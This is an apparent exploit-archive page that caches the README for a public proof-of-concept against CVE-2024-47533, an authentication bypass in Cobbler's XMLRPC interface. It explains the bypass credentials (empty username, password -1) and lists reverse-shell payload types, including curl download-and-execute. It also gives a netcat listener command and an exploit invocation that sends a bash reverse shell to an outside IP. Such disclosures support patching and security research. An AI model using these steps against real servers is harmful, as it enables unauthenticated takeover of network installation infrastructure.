Goal Reached Thanks to every supporter — we hit 100%!

Goal: 1000 CNY · Raised: 1000 CNY

100.0%
Buy Us a Coffee

CVE-2024-47533 PoC — Cobbler 授权问题漏洞

Source
https://github.com/dollarboysushil/CVE-2024-47533-Cobbler-XMLRPC-Authentication-Bypass-RCE-Exploit-POC
Associated Vulnerability
Title:Cobbler 授权问题漏洞 (CVE-2024-47533)
Description:Cobbler是Cobbler开源的一款网络安装服务器套件,它主要用于快速建立Linux网络安装环境。 Cobbler 3.0.0到3.2.3和3.3.7之前版本存在授权问题漏洞,该漏洞源于身份验证不当,导致任何能够通过网络访问服务器的人都可以完全控制该服务器。
Description
CVE-2024-47533 is a critical authentication bypass vulnerability in Cobbler (versions 3.0.0 to before 3.2.3 and 3.3.7) allowing unauthenticated remote code execution via the XMLRPC interface.
Readme
# CVE-2024-47533 - Cobbler XMLRPC Authentication Bypass RCE Exploit

⚠️ Critical Remote Code Execution via Authentication Bypass in Cobbler  
🛠️ PoC implementation by @dollarboysushil

---

## 💡 Overview

Cobbler, a Linux installation server that enables rapid setup of network installation environments, has an authentication vulnerability in versions 3.0.0 up to (but not including) 3.2.3 and 3.3.7. The function utils.get_shared_secret() always returns -1, allowing anyone to connect to the Cobbler XML-RPC interface with an empty username ('') and password -1. This lets an attacker with network access gain full control of the Cobbler server. The vulnerability is fixed in versions 3.2.3 and 3.3.7.

---

## 🛠 Technical Breakdown

The vulnerability is caused by improper handling of the shared secret in the `utils.get_shared_secret()` function, which always returns `-1`, effectively bypassing authentication. This lets any network user connect to Cobbler’s XMLRPC interface with empty credentials and execute arbitrary commands.

---

## 🔥 Vulnerable Endpoint

`http://<target>:25151/` — Cobbler's XMLRPC API endpoint

---

## 💥 Example Payloads

The exploit script supports various reverse shell payloads including:

- Bash reverse shell
- Netcat shells (`nc`, `nc2`)
- Python reverse shell
- Curl download & execute

---

## 🔬 Proof-of-Concept (PoC) Demonstration

### 📡 Preparing the Listener

Start a Netcat listener on your machine:

```bash
nc -lvnp 4444
```

![netcat listener](images/image.png)

### 🚀 Launching the Exploit

Run the exploit script CVE-2024-47533-dbs.py.

```bash
python3 CVE-2024-47533-dbs.py -t http://127.0.0.1:25151 -l 10.10.15.16 -p 4444 --payload bash
```

![CVE-2024-47533-dbs.py](images/image2.png)

### 💻 Successful Remote Shell Access

Upon successful execution, the reverse shell will connect back to the listener, granting the attacker remote access to the server.

![Successfull Reverse Shell](images/image3.png)

## 📝 References

- [SUSE Security Advisory for CVE-2024-47533](https://www.suse.com/security/cve/CVE-2024-47533.html)
- [GitHub Security Advisory GHSA-m26c-fcgh-cp6h](https://github.com/advisories/GHSA-m26c-fcgh-cp6h)
- [Snyk Vulnerability Database: SNYK-PYTHON-COBBLER-8384360](https://security.snyk.io/vuln/SNYK-PYTHON-COBBLER-8384360)
File Snapshot

 [4.0K]  /data/pocs/60914d9fafda55173ab6cd58aa241660fe742a11
├── [2.8K]  CVE-2024-47533-dbs.py
├── [4.0K]  images
│   ├── [ 39K]  image2.png
│   ├── [ 28K]  image3.png
│   └── [9.7K]  image.png
└── [2.3K]  README.md

1 directory, 5 files
Shenlong Bot has cached this for you
Remarks
    1. It is advised to access via the original source first.
    2. If the original source is unavailable, please email f.jinxu#gmail.com for a local snapshot (replace # with @).
    3. Shenlong has snapshotted the POC code for you. To support long-term maintenance, please consider donating. Thank you for your support.